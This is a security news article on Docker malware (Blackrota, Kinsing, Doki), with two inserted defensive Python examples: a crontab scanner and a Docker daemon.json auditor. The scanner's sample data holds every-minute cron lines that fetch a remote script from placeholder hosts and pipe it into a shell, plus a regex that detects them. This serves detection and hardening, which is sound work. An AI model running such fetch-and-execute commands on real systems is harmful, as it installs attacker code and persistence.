Blackrota – Docker’s Newest Malware

It is no exaggeration to say that ransomware dominates the InfoSec news feed. This has been the case for several years, but 2020 is surely breaking all past records. With ransomware dominating the headlines, a few other malware trends for the year have crept by almost unnoticed. One of those trends is the growing popularity of Docker malware. Docker has become a popular framework for web and app developers, and since 2017 malware has emerged that targets Docker users who don't properly secure their applications.

Initially, the malware discovered looked to infect developers who had misconfigured admin interfaces. It was used to drop cryptocurrency miners, like CoinMiner, and attackers simply trawled for vulnerable systems. Since those early days, Docker malware has evolved significantly and new strains are being discovered on a regular basis. Despite the rise in this kind of malware, developers are still not applying basic cybersecurity principles to projects. The most common mistake made by developers is leaving Docker remote administration API endpoints exposed online without authentication. Attackers will then look to install cryptocurrency miners or backdoor trojans via malicious operating system images (OS images).

According to a recently published blog post, Chinese security firm Qihoo 360 has discovered another strain of Docker malware, codenamed Blackrota after the name the malware's developers gave to its command and control server, blackrota.ga.


The malware is written in Go (Golang), a programming language whose popularity keeps increasing and which has recently also seen increased use by malware developers. Qihoo 360 researchers have only discovered a Linux version to date and are unsure what exactly the malware is used for. Researchers noted,

The Blackrota backdoor is currently only available for Linux, in ELF file format, and supports both x86/x86-64 CPU architectures. Blackrota is configured and compiled based on geacon, a CobaltStrike Beacon implemented in the Go language, which can be used as a CobaltStrike Beacon that interacts with CobaltStrike to control compromised hosts…However, it only implements some of the key functions in the original CobaltStrike Beacon:

  • CMD_SHELL: Execute Shell command;
  • CMD_UPLOAD: Upload files;
  • CMD_DOWNLOAD: Download the specified file;
  • CMD_FILE_BROWSE: File browsing;
  • CMD_CD: Change directory;
  • CMD_SLEEP: Set the sleep delay time;
  • CMD_PWD: Return current directory;
  • CMD_EXIT: Exit.

CobaltStrike is a popular penetration testing tool used by both legitimate and illegitimate parties. Threat actors have also looked to abuse the Cobalt Strike framework's client agent, known as Beacon. In this instance, Blackrota uses a Go implementation of Beacon called Geacon. What further sets Blackrota apart is that the code is obfuscated using an open-source tool, gobfuscate. Currently, finding malware written in Go that is obfuscated is rare, EKANS being another example. Researchers noted,

“The obfuscation method of Blackrota and EKANS creates new challenges for reverse analysis. As the Go language becomes more popular, more and more malware will be written in Go in the future, we will keep an eye on what is going to happen.”

More Docker Malware to be Aware of

In April 2020, another Docker malware was seen redefining what malware targeting Docker could do. In an article published at the time, the malware was described as fileless and self-propagating, dangerous words to be associated with any malware. As with other Docker malware strains, including Blackrota, the attackers scanned for and targeted vulnerable Docker API ports. The campaign was highly organized and managed to infect thousands of vulnerable ports on a daily basis. It had been active for months but stepped up activity towards the end of the first quarter of 2020.

The malware, named Kinsing, begins its infection routine with the above-mentioned scanning for API ports left open to the Internet. Once one is discovered, the malware accesses the port and runs a rogue Ubuntu container. The container issues a command that fetches the Kinsing malware, which in turn downloads and runs a cryptocurrency miner. Not content to merely run the miner, the final stage of the infection routine involves the malware looking to self-propagate to other containers and hosts. Further, the malware can download a shell script. The script disables security measures and clears logs; kills any other malware or cryptominers and deletes any files related to them; kills any running rival malicious Docker containers and deletes their images; downloads the Kinsing malware and runs it; and uses a "crontab" entry to download and run the same original script once every minute, which is believed to be done to ensure persistence.

Like Blackrota, the malware is written in Go and makes use of several libraries that set up communication between the infected container and the attackers' command-and-control server; monitor systems and processes; and establish a disk-backed key-value storage area to hold data. Its main function, though, is to act as a dropper that loads scripts and executes other malware. The cryptocurrency miner it drops is not unique, but it does what it is meant to: mine bitcoin using the victim's resources. It is feared that Kinsing may be used to drop other malware types, not just the miner; in the past, crypto-jacking malware designed to steal cryptocurrency wallet addresses and credentials has been used in campaigns targeting Docker containers. However, like Kinsing, the miner can also spread laterally, infecting other containers the developer may have set up.
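The every-minute crontab persistence described above is something a defender can look for directly. This added example (not code from the article or from the Kinsing research) parses a constructed crontab and flags entries that fetch a remote script and pipe it into a shell, rating every-minute schedules highest; the host addresses in the sample are placeholders.

```python
import re

# Constructed sample crontab: two benign jobs, two download-and-execute
# persistence entries of the kind described above, and one every-minute job.
# The 198.51.100.0/24 address and example.invalid host are placeholders.
CRONTAB_SAMPLE = """\
# constructed sample crontab
PATH=/usr/local/bin:/usr/bin
0 3 * * * /usr/local/bin/backup.sh
*/15 * * * * /usr/bin/certbot renew --quiet
* * * * * curl -fsSL http://198.51.100.23/example.sh | sh
* * * * * wget -q -O- http://example.invalid/x.sh | bash
* * * * * /usr/local/bin/healthcheck
"""

# A downloader whose output is piped straight into a shell interpreter.
FETCH_PIPE_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|da)?sh\b")
EVERY_MINUTE = ("*", "*", "*", "*", "*")


def parse_crontab(text):
    """Yield (line_no, schedule_fields, command) for each job line.

    Comments, blank lines and VAR=value assignments are skipped.
    """
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        entries.append((lineno, tuple(fields[:5]), fields[5]))
    return entries


def find_suspicious_cron(text):
    """Return (line_no, severity, reason) for entries worth an analyst's look."""
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        fetch = bool(FETCH_PIPE_SHELL.search(command))
        every_minute = schedule == EVERY_MINUTE
        if fetch and every_minute:
            findings.append((lineno, "high", "remote script piped to a shell every minute"))
        elif fetch:
            findings.append((lineno, "medium", "remote script piped to a shell"))
        elif every_minute:
            findings.append((lineno, "low", "every-minute job; review the command"))
    return findings


if __name__ == "__main__":
    for lineno, severity, reason in find_suspicious_cron(CRONTAB_SAMPLE):
        print(f"line {lineno}: [{severity}] {reason}")
```

Run it against `crontab -l` output or files under `/etc/cron.d` by replacing the constructed sample with the real text.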

Kinsing is noteworthy for its ability to self-propagate, but perhaps the most famous Docker malware is Doki. The malware yet again begins with the attacker scanning for vulnerable ports, but its role is to create a backdoor in the infected container. Doki is believed to be spread by the Ngrok Botnet, with researchers concluding,

“The Ngrok Botnet campaign has been ongoing for over two years and is rather effective, infecting any misconfigured Docker API server in a matter of hours. The incorporation of the unique and undetected Doki malware indicates the operation is continuing to evolve. This attack is very dangerous due to the fact the attacker uses container escape techniques to gain full control of the victim’s infrastructure. Our evidence shows that it takes only a few hours from when a new misconfigured Docker server is up online to become infected by this campaign."

Lessons needing to be Learnt

Blackrota, in summary, is a Cobalt Strike Beacon written in Go. While the malware's main purpose is yet unknown, its discovery does teach an important lesson, namely that developers need to ensure servers are configured correctly. Docker can no longer be considered a fringe technology; the popularity of the framework means that it is now a viable target for threat actors to exploit. If developers do not take any measures to secure servers and properly configure interfaces, heartache and hard lessons will surely follow.

Docker's documentation does include a number of security measures developers can take to help prevent being targeted by threat actors. Further, there are several online video tutorials and step-by-step guides available to help in the process. Security researchers at Trend Micro have also provided some helpful advice for developers looking to avoid security mistakes when deploying applications. They advise that developers minimize the use of third-party software when introducing it to the Docker container.

If third-party software must be used, make sure it is from a trusted source. Containers should be hosted on a container-focused OS, which greatly reduces the attack surface. Security tools like Clair can help prevent vulnerability exploitation and can provide analysis of containers to further help in securing them. Lastly, scan the images used by the containers to see if they contain any vulnerabilities.
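The configuration mistake named earlier, a Docker remote API endpoint reachable without authentication, is the first thing to check before any of the advice above. This added example (not from the article, Docker or Trend Micro) audits a daemon.json and reports any tcp:// listener that lacks client certificate verification; the file paths in the secure sample are placeholders.

```python
import json
from urllib.parse import urlsplit

# Constructed sample: a daemon.json that exposes the API over plaintext TCP
# (the misconfiguration the article describes) and a corrected one that
# requires client certificates. The certificate paths are placeholders.
INSECURE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SECURE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

TLS_FILE_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(raw):
    """Return a list of findings for the text of a Docker daemon.json.

    unix:// and fd:// sockets are local-only and are ignored. A tcp://
    listener passes only when tlsverify is set and the CA, certificate and
    key are all configured; "tls": true alone encrypts but does not
    authenticate clients, so it is still reported.
    """
    cfg = json.loads(raw)
    tls_files = all(cfg.get(k) for k in TLS_FILE_KEYS)
    findings = []
    for host in cfg.get("hosts", []):
        parts = urlsplit(host)
        if parts.scheme != "tcp":
            continue
        bind = parts.hostname or ""
        where = "all interfaces" if bind in ("", "0.0.0.0", "::") else bind
        if cfg.get("tlsverify") and tls_files:
            continue
        if cfg.get("tls") or cfg.get("tlsverify"):
            findings.append(f"{host}: TLS requested on {where} but client certificate verification is incomplete")
        else:
            findings.append(f"{host}: plaintext, unauthenticated API on {where}")
    return findings


if __name__ == "__main__":
    for label, text in (("insecure", INSECURE_DAEMON_JSON), ("secure", SECURE_DAEMON_JSON)):
        print(label, audit_daemon_config(text) or ["no findings"])
```

On a real host, pass the contents of /etc/docker/daemon.json; listeners added on the dockerd command line or in a systemd unit need to be checked the same way.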

As more and more developers turn to Docker and its user base grows, malware targeting the framework will likely surge with new variants. The future will bring more damaging types of malware, not just coin miners and backdoors.


About the author:

Karolis Liucveikis
